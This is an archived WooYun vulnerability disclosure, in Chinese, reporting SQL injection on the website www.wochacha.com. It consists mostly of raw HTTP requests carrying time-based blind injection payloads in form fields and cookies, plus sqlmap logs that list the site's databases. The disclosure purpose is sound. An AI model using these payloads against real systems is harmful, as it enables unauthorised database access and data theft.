乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开
1
1.POST数据包:
POST /about/bugbacksave HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 1242Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NGEUERKTBFX-Requested-With: XMLHttpRequestReferer: http://www.wochacha.com:80/Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82Host: www.wochacha.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_QUNRCSDYVU-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="item"4-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="mobile_brand"-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="mobile_type"987-65-4329-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="project_type"0-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="quest"1-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="question_type"0-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="system_version"1-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_email"###############email######-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_qq"###############QQ-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_tel"##########################?-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="wochacha_version"1-------AcunetixBoundary_QUNRCSDYVU--
跑了下 security 库 太慢了 剩下的数据以及库就不跑了
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 99 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: -------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="item"4-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="mobile_brand"if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))RjDc) AND'bhHH'='bhHH'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="mobile_type"987-65-4329-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="project_type"0-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="quest"1-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="question_type"0-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="system_version"1-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_email"###############email######-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_qq"###############QQ-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="user_tel"##########################?-------AcunetixBoundary_QUNRCSDYVUContent-Disposition: form-data; name="wochacha_version"1-------AcunetixBoundary_QUNRCSDYVU-----[14:37:45] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.12[14:37:45] [INFO] fetching database names[14:37:45] [INFO] fetching number of databases[14:37:45] [INFO] retrieved:[14:37:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y10[14:38:06] [INFO] retrieved: information_schema[14:45:11] [INFO] retrieved: gcore[14:47:23] [INFO] retrieved: gcoreinc[14:50:27] [INFO] retrieved: mysql[14:52:37] [INFO] retrieved: security[14:55:45] [INFO] retrieved: test[14:57:28] [INFO] retrieved: thir[14:59:46] [ERROR] invalid character detected. retrying..[14:59:46] [WARNING] increasing time delay to 6 seconds[15:00:31] [ERROR] invalid character detected. retrying..[15:00:31] [WARNING] increasing time delay to 7 secondsda[15:01:54] [ERROR] invalid character detected. retrying..[15:01:54] [WARNING] increasing time delay to 8 secondspp[15:04:17] [INFO] retrieved: trap[15:06:56] [INFO] retrieved: wcc[15:08:40] [INFO] retrieved: zabbixavailable databases [10]:[*] gcore[*] gcoreinc[*] information_schema[*] mysql[*] security[*] test[*] thirdapp[*] trap[*] wcc[*] zabbix[15:12:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.wochacha.com'[*] shutting down at 15:12:12
2.POST数据包:
POST /login_register.html HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 230Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.wochacha.com:80/Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82Host: www.wochacha.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*mobilephone=&password=g00dPa%24%24w0rD&repassword=g00dPa%24%24w0rD&validateword=01/01/1967&yan=1
剩下的就不跑了
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 98 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: mobilephone=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))Jzru) AND 'Xbzt'='Xbzt'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&password=g00dPa$$w0rD&repassword=g00dPa$$w0rD&validateword=01/01/1967&yan=1---[14:38:19] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.12[14:38:19] [INFO] fetching database names[14:38:19] [INFO] fetching number of databases[14:38:19] [INFO] retrieved:[14:38:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors1[14:38:41] [ERROR] invalid character detected. retrying..0[14:38:54] [INFO] retrieved: information_schema[14:46:10] [INFO] retrieved: gcore[14:48:19] [INFO] retrieved:[14:48:41] [ERROR] invalid character detected. retrying..gcoreinc[14:51:43] [INFO] retrieved: mysql[14:53:58] [ERROR] invalid character detected. retrying..[14:54:01] [INFO] retrieved: securi[14:56:36] [ERROR] invalid character detected. retrying..ty[14:57:50] [ERROR] invalid character detected. retrying..[14:57:53] [INFO] retrieved: tes[14:59:46] [ERROR] invalid character detected. retrying..t[15:00:33] [INFO] retrieved: th[15:02:07] [ERROR] invalid character detected. retrying..[15:02:58] [ERROR] invalid character detected. retrying..irdapp[15:05:48] [INFO] retrieved: trap[15:07:33] [INFO] retrieved: wcc[15:08:57] [ERROR] invalid character detected. retrying..[15:09:09] [ERROR] invalid character detected. retrying..[15:09:12] [INFO] retrieved: zabb[15:11:01] [ERROR] invalid character detected. retrying..ix[15:12:08] [ERROR] invalid character detected. retrying..available databases [10]:[*] gcore[*] gcoreinc[*] information_schema[*] mysql[*] security[*] test[*] thirdapp[*] trap[*] wcc[*] zabbix[15:12:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.wochacha.com'[*] shutting down at 15:12:11
3.cookie注入 很多处这里我就列举一处 其他处自查
GET /login/ HTTP/1.1Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82; username=X-Requested-With: XMLHttpRequestReferer: http://www.wochacha.com:80/Host: www.wochacha.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
多参数可注入
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 361 HTTP(s) requests:---Parameter: Cookie #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82; username=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))swAQ) AND 'tKym'='tKym'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/---[14:43:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.12[14:43:32] [INFO] fetching database names[14:43:32] [INFO] fetching number of databases[14:43:32] [INFO] retrieved:[14:43:32] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[14:44:02] [INFO] adjusting time delay to 4 seconds due to good response times[14:44:07] [ERROR] invalid character detected. retrying..[14:44:07] [WARNING] increasing time delay to 5 seconds10[14:44:26] [INFO] retrieved: informat[14:48:03] [ERROR] invalid character detected. retrying..[14:48:03] [WARNING] increasing time delay to 6 seconds[14:48:34] [ERROR] invalid character detected. retrying..[14:48:34] [WARNING] increasing time delay to 7 secondsio[14:50:03] [ERROR] invalid character detected. retrying..[14:50:03] [WARNING] increasing time delay to 8 secondsn[14:51:42] [ERROR] invalid character detected. retrying..[14:51:42] [WARNING] increasing time delay to 9 seconds_sc[14:54:28] [ERROR] unable to properly validate last character value ('y')..yema[14:55:25] [ERROR] invalid character detected. retrying..[14:55:25] [WARNING] increasing time delay to 5 seconds[14:55:28] [INFO] retrieved: g[14:56:13] [ERROR] invalid character detected. retrying..[14:56:13] [WARNING] increasing time delay to 6 secondscore[14:58:24] [ERROR] invalid character detected. retrying..[14:58:24] [WARNING] increasing time delay to 7 seconds[14:58:27] [INFO] retrieved: gc[15:00:26] [ERROR] invalid character detected. retrying..[15:00:26] [WARNING] increasing time delay to 8 secondso[15:02:07] [ERROR] invalid character detected. retrying..[15:02:07] [WARNING] increasing time delay to 9 secondsrein[15:05:36] [ERROR] unable to properly validate last character value ('q')..q[15:05:38] [INFO] retrieved: my[15:06:54] [ERROR] invalid character detected. retrying..[15:06:54] [WARNING] increasing time delay to 5 secondssql[15:08:27] [ERROR] invalid character detected. retrying..[15:08:27] [WARNING] increasing time delay to 6 seconds[15:08:30] [INFO] retrieved: secur[15:10:57] [ERROR] invalid character detected. retrying..[15:10:57] [WARNING] increasing time delay to 7 seconds[15:11:32] [ERROR] invalid character detected. retrying..[15:11:32] [WARNING] increasing time delay to 8 secondsit[15:13:48] [ERROR] invalid character detected. retrying..[15:13:48] [WARNING] increasing time delay to 9 secondsy[15:14:29] [INFO] retrieved: t[15:16:09] [ERROR] unable to properly validate last character value ('i')..is[15:17:14] [ERROR] invalid character detected. retrying..[15:17:14] [WARNING] increasing time delay to 5 secondst[15:18:14] [ERROR] invalid character detected. retrying..[15:18:14] [WARNING] increasing time delay to 6 seconds[15:18:40] [ERROR] invalid character detected. retrying..[15:18:40] [WARNING] increasing time delay to 7 seconds[15:19:03] [ERROR] invalid character detected. retrying..[15:19:03] [WARNING] increasing time delay to 8 seconds[15:19:24] [ERROR] invalid character detected. retrying..[15:19:24] [WARNING] increasing time delay to 9 seconds[15:19:44] [ERROR] unable to properly validate last character value ('A')..A[15:19:55] [ERROR] invalid character detected. retrying..[15:19:55] [WARNING] increasing time delay to 5 seconds[15:20:27] [ERROR] invalid character detected. retrying..[15:20:27] [WARNING] increasing time delay to 6 seconds[15:20:52] [ERROR] invalid character detected. retrying..[15:20:52] [WARNING] increasing time delay to 7 seconds[15:20:56] [INFO] retrieved:[15:21:32] [ERROR] invalid character detected. retrying..[15:21:32] [WARNING] increasing time delay to 8 secondsthird[15:25:11] [ERROR] invalid character detected. retrying..[15:25:11] [WARNING] increasing time delay to 9 secondsapp[15:27:40] [INFO] retrieved: tr[15:29:40] [ERROR] unable to properly validate last character value ('a')..ap[15:30:10] [INFO] retrieved: wcc[15:31:23] [INFO] retrieved: z[15:32:03] [ERROR] invalid character detected. retrying..[15:32:03] [WARNING] increasing time delay to 5 seconds
危害等级:无影响厂商忽略
忽略时间:2015-08-09 10:52
漏洞Rank:15 (WooYun评价)
暂无